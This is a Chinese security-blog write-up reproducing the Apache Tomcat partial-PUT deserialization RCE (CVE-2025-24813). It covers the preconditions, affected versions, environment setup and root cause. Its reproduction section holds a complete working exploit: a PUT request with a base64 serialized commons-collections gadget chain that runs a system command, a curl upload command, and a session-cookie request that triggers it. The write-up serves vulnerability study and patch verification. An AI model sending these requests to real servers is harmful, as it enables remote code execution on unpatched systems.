免责声明
本公众号所提供的文字和信息仅供学习和研究使用,请读者自觉遵守法律法规,不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任。
漏洞简述
该漏洞的核心在于 Tomcat 在处理不完整PUT请求上传时,会使用了一个基于用户提供的文件名和路径生成的临时文件。
若同时满足以下条件,攻击者可执行任意代码:
-
默认 Servlet 启用了写权限(默认禁用)
-
启用了部分PUT请求支持(默认启用)
-
应用程序使用 Tomcat 的基于文件的会话持久化(默认存储位置)
-
应用程序包含可被利用于反序列化攻击的库
漏洞影响
Apache Tomcat 11.0.0-M1 至 11.0.2
Apache Tomcat 10.1.0-M1 至 10.1.34
Apache Tomcat 9.0.0-M1 至 9.0.98
漏洞复现
环境搭建
复现版本Tomcat 9.0.98
https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.98/bin/apache-tomcat-9.0.98.zip
构造利用条件:
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
条件四、下载 commons-collections-3.2.1.jar, 将该 jar 包放入webappsROOTWEB-INFlib
目录下
https://repo1.maven.org/maven2/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar
环境搭建好后启动tomcat
漏洞原理
Content-Range
在 Tomcat 的HTTP PUT请求中主要用于实现大文件的分块传输。在文件上传未完成的情况下,内容会被临时存储在Tomcat的工作目录:$CATALINA_BASE/work/Catalina/localhost/ROOT
。
该漏洞的核心在于不完整PUT请求上传时的文件名处理机制:文件路径中的分隔符/
会被转换为.
。例如:访问/xxxxx/session
会被解析为.xxxxx.session
因此整个漏洞的利用过程为:
-
Tomcat的File会话存储默认路径同样位于: CATALINA_BASE/work/Catalina/localhost/ROOT
-
当存在反序列化利用链时,可以上传包含恶意序列化数据的文件 -
通过设置 JSESSIONID=.xxxxx
来触发漏洞
PUT /poc/session HTTP/1.1
Host: 192.168.1.48:8080
Content-Range: bytes 0-1000/1200
{{base64dec(rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHNyADpjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UZW1wbGF0ZXNJbXBsCVdPwW6sqzMDAAZJAA1faW5kZW50TnVtYmVySQAOX3RyYW5zbGV0SW5kZXhbAApfYnl0ZWNvZGVzdAADW1tCWwAGX2NsYXNzdAASW0xqYXZhL2xhbmcvQ2xhc3M7TAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX+AYIVOACAAB4cAAAA8LK/rq+AAAAMgBCAQBTb3JnL2FwYWNoZS9jb21tb21zL2JlYW51dGlscy9jb3lvdGUvbm9kZS9PYmplY3ROb2RlOTZmY2ViYmNkMzNhNGU2ZWEyNmRkZDllYTY5OTQ3MmYHAAEBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwADAQAEYmFzZQEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAA3NlcAEAA2NtZAEABjxpbml0PgEAAygpVgEAE2phdmEvbGFuZy9FeGNlcHRpb24HAAsMAAkACgoABAANAQAHb3MubmFtZQgADwEAEGphdmEvbGFuZy9TeXN0ZW0HABEBAAtnZXRQcm9wZXJ0eQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7DAATABQKABIAFQEAEGphdmEvbGFuZy9TdHJpbmcHABcBAAt0b0xvd2VyQ2FzZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7DAAZABoKABgAGwEAA3dpbggAHQEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaDAAfACAKABgAIQEAB2NtZC5leGUIACMMAAUABgkAAgAlAQACL2MIACcMAAcABgkAAgApAQAHL2Jpbi9zaAgAKwEAAi1jCAAtDAAIAAYJAAIALwEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgcAMQEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYMAAkAMwoAMgA0AQAFc3RhcnQBABUoKUxqYXZhL2xhbmcvUHJvY2VzczsMADYANwoAMgA4AQAQamF2YS9sYW5nL09iamVjdAcAOgEACDxjbGluaXQ+AQAEY2FsYwgAPQoAAgANAQAEQ29kZQEADVN0YWNrTWFwVGFibGUAIQACAAQAAAADAAkABQAGAAAACQAHAAYAAAAJAAgABgAAAAIAAQAJAAoAAQBAAAAAhAAEAAIAAABTKrcADhIQuAAWtgAcEh62ACKZABASJLMAJhIoswAqpwANEiyzACYSLrMAKga9ABhZA7IAJlNZBLIAKlNZBbIAMFNMuwAyWSu3ADW2ADlXpwAETLEAAQAEAE4AUQAMAAEAQQAAABcABP8AIQABBwACAAAJZQcADPwAAAcAOwAIADwACgABAEAAAAAaAAIAAAAAAA4SPrMAMLsAAlm3AD9XsQAAAAAAAHB0ACQzYTRlOTViYi00MGYwLTQyMGEtODc5ZS0wZjAyZjgzZDk2NDVwdwEAeHNyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5JbnZva2VyVHJhbnNmb3JtZXKH6P9re3zOOAIAA1sABWlBcmdzdAATW0xqYXZhL2xhbmcvT2JqZWN0O0wAC2lNZXRob2ROYW1lcQB+AAlbAAtpUGFyYW1UeXBlc3EAfgAIeHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAAdAATZ2V0T3V0cHV0UHJvcGVydGllc3VyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHh4)}}
curl -X PUT -H "Content-Range: bytes 0-1000/1200" --data-binary .ser http://localhost:8080/poc/session
GET /
Host: 192.168.1.48:8080
Cookie: JSESSIONID=.poc
参考链接:
https://forum.butian.net/article/674
https://www.cnblogs.com/smileleooo/p/18772389
获取 POC
原文始发于微信公众号(贝雷帽SEC):Apache Tomcat RCE漏洞复现(CVE-2025-24813)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论